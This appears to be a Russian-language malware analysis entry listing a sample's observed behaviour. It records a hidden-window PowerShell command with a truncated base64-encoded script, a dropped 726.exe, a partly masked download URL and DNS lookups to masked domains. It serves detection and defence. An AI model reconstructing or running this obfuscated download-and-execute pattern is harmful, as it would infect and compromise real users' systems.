Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHIAcwBlAHAAdQBkAHgAZgB2AHMAPQAnAFEAbQBxAHkAZQByAHEAYgAnADsAJABOAHcAYgB4AGUAbQBkAGwAYwB4AHUAZAB4AC...
- %HOMEPATH%\726.exe
- %HOMEPATH%\726.exe
- http://fa######ectsolutions.com/wp-includes/ily8g-nogm0-98621/
- DNS ASK ze####reation.co.uk
- DNS ASK pa####project.net
- DNS ASK fa######ectsolutions.com
- DNS ASK go###akidz.club
- DNS ASK st####giceis.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHIAcwBlAHAAdQBkAHgAZgB2AHMAPQAnAFEAbQBxAHkAZQByAHEAYgAnADsAJABOAHcAYgB4AGUAbQBkAGwAYwB4AHUAZAB4AC...' (со скрытым окном)